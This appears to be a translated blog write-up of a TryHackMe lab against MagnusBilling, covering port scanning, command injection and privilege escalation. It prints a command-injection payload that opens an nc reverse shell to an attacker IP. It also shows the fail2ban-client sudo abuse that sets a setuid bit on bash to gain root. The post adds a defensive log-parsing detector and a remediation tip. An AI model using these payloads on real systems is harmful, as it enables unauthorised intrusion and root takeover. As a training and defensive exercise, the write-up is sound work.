
Introduction

It's been a while since I last posted on Qiita. I'm Kurimochi, the one who ended up going "I'm!!!! so weak!!!!" at SECCON 14 Quals and TSG CTF.
That said, I recently managed to solve a TryHackMe room on my own for the first time in a while, so I thought I'd leave a writeup here.

Enumerate

First, a port scan.

$ rustscan -a 10.49.148.49 --ulimit 5000 -- -sCV -A -Pn

[!] Looks like I didn't find any open ports for 10.49.148.49. This is usually caused by a high batch size.

*I used 4500 batch size, consider lowering it with 'rustscan -b <batch_size> -a <ip address>' or a comfortable number for your system.

 Alternatively, increase the timeout if your ping is high. Rustscan -t 2000 for 2000 milliseconds (2s) timeout.

The batch size seems to be too large. I'll handle it with -b 2000.

$ rustscan -b 2000 -a 10.49.148.49 --ulimit 5000 -- -sCV -A -Pn

[~] Automatically increasing ulimit value to 5000.
Open 10.49.148.49:22
Open 10.49.148.49:80
Open 10.49.148.49:3306
Open 10.49.148.49:5038
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -sCV -A -Pn" on ip 10.49.148.49
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-23 20:41 +0900

PORT     STATE SERVICE  REASON  VERSION
22/tcp   open  ssh      syn-ack OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
|   256 d2:85:3e:5f:04:36:d2:04:32:37:9f:2d:80:a0:7a:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPMvzkf5Ny5VSaKTboAYxdqh2qwPHVkM407zeLPDjrrPpPHwha+yxgFy82D0h0N1gaMoN4nK1l9Uh91UDqA7HX8=
|   256 51:b7:a3:f8:66:42:55:dd:ed:89:c6:2b:6f:39:88:20 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIM3lELkmSfRo6Ec9XHDQZ0JzBWBHpwU7SUf806yL40Ez
80/tcp   open  http     syn-ack Apache httpd 2.4.62 ((Debian))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/mbilling/
| http-title:             MagnusBilling
|_Requested resource was http://10.49.148.49/mbilling/
|_http-server-header: Apache/2.4.62 (Debian)
3306/tcp open  mysql    syn-ack MariaDB 10.3.23 or earlier (unauthorized)
5038/tcp open  asterisk syn-ack Asterisk Call Manager 2.10.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Checking HTTP, a login form appears. It seems to be a service called MagnusBilling.


Initial Access

Now, searching for "MagnusBilling exploit" turned up the following.

It seems a reverse shell can be obtained. I don't know the version, so there's no guarantee...

Let's just try it anyway.

$ uv run --with requests exploit.py -t 10.49.148.49 -a 192.168.195.41 -p 4444
=== Magnus Billing System v7 Exploit by Tinashe Matanda(SadNinja) ===
Command Injection via icepay.php - Reverse Shell
=======================================
[+] Targeting: http://10.49.148.49/mbilling/lib/icepay/icepay.php
[+] Attacker: 192.168.195.41:4444
[+] Sending payload: ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.195.41 4444 >/tmp/f;
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.49.148.49 52034
sh: 0: can't access tty; job control turned off
$ whoami
asterisk

It just worked...
Let's stabilize the shell for good measure.

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
asterisk@ip-10-49-148-49:/var/www/html/mbilling/lib/icepay$ ^Z
zsh: suspended  nc -lvnp 4444

$ stty raw -echo; fg
[1]  + continued  nc -lvnp 4444

Privilege Escalation

The user we currently have access as is asterisk, but looking at sudo -l, it seems /usr/bin/fail2ban-client can be run through sudo without a password.

asterisk@ip-10-49-148-49:/home/magnus$ sudo -l
Matching Defaults entries for asterisk on ip-10-49-148-49:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty

User asterisk may run the following commands on ip-10-49-148-49:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client

Searching for "fail2ban client sudo privesc", the following article came up.

Let's run it as described there.

asterisk@ip-10-49-148-49:/home/magnus$ sudo /usr/bin/fail2ban-client status
Status
|- Number of jail:	8
`- Jail list:	ast-cli-attck, ast-hgc-200, asterisk-iptables, asterisk-manager, ip-blacklist, mbilling_ddos, mbilling_login, sshd
asterisk@ip-10-49-148-49:/home/magnus$ sudo /usr/bin/fail2ban-client get sshd
2025-12-23 02:19:22,683 fail2ban                [3060]: ERROR   NOK: ('list index out of range',)
Sorry but the command is invalid
<ome/magnus$ sudo /usr/bin/fail2ban-client get sshd actions
The jail sshd has the following actions:
iptables-multiport
<ome/magnus$ sudo /usr/bin/fail2ban-client set sshd addaction evil
evil
< set sshd action evil actionban "chmod +s /bin/bash"
chmod +s /bin/bash
<ome/magnus$ sudo /usr/bin/fail2ban-client set sshd banip 1.2.3.5
1
asterisk@ip-10-49-148-49:/home/magnus$ /bin/bash -p
bash-5.2# whoami
root

I used the sshd jail somewhat arbitrarily here, but I was able to escalate to root without any trouble.
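From the defender's side, the whole sequence above (addaction, action ... actionban, banip) is logged by sudo to auth.log because each step is a separate sudo invocation. The following is an added example, not part of the original writeup, that parses constructed sudo log lines mirroring that sequence and raises an alert only when a user both rewrites a jail's action hook and then forces a ban on the same jail; the log lines, hostname and function names are my assumptions.

```python
import re
from typing import Dict, List, Optional
# Constructed sample auth.log lines (not captured from the room) mirroring the
# sudo sequence in the writeup; the format is sudo's default syslog line.
SAMPLE_AUTH_LOG = """\
Dec 23 02:19:51 host sudo: asterisk : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set sshd addaction evil
Dec 23 02:20:05 host sudo: asterisk : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set sshd action evil actionban chmod +s /bin/bash
Dec 23 02:20:20 host sudo: asterisk : TTY=pts/0 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/fail2ban-client set sshd banip 1.2.3.5
Dec 23 02:25:00 host sudo: magnus : TTY=pts/1 ; PWD=/home/magnus ; USER=root ; COMMAND=/usr/bin/apt update
"""
SUDO_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sudo:\s+(?P<user>\S+) : "
                     r".*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$")
# Hooks that fail2ban runs as root whenever a jail bans/unbans/starts/stops.
ACTION_HOOKS = {"actionban", "actionunban", "actionstart", "actionstop"}

def classify(cmd: str) -> Optional[str]:
    """Label a sudo COMMAND that rewrites or fires a fail2ban jail action."""
    p = cmd.split()
    if len(p) < 4 or not p[0].endswith("fail2ban-client") or p[1] != "set":
        return None
    if p[3] == "addaction":
        return "addaction"
    if p[3] == "action" and len(p) >= 6 and p[5] in ACTION_HOOKS:
        return "action:" + p[5]
    if p[3] == "banip":
        return "banip"  # a manual ban fires every actionban hook of that jail
    return None

def find_fail2ban_abuse(log_text: str) -> List[Dict[str, str]]:
    """Suspicious sudo fail2ban-client invocations, with user and jail."""
    hits = []
    for line in log_text.splitlines():
        m = SUDO_RE.match(line)
        kind = classify(m["cmd"]) if m else None
        if kind:
            hits.append({"ts": m["ts"], "user": m["user"], "runas": m["runas"],
                         "jail": m["cmd"].split()[2], "kind": kind})
    return hits

def escalation_alerts(hits: List[Dict[str, str]]) -> List[str]:
    """Flag a user who rewrote a jail's action hook and then forced a ban on it."""
    armed, alerts = set(), []
    for h in hits:
        key = (h["user"], h["jail"])
        if h["kind"].startswith("action:"):
            armed.add(key)
        elif h["kind"] == "banip" and key in armed:
            alerts.append(f"{h['ts']} {h['user']} armed and fired an action hook on jail {h['jail']} as {h['runas']}")
    return alerts
```

The same sudo log also shows the root cause to fix: a NOPASSWD rule on fail2ban-client is effectively a NOPASSWD rule on arbitrary root commands, so the sudoers entry should go, not just the jail.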

Get Flags

bash-5.2# cat /home/magnus/user.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
bash-5.2# cat /root/root.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx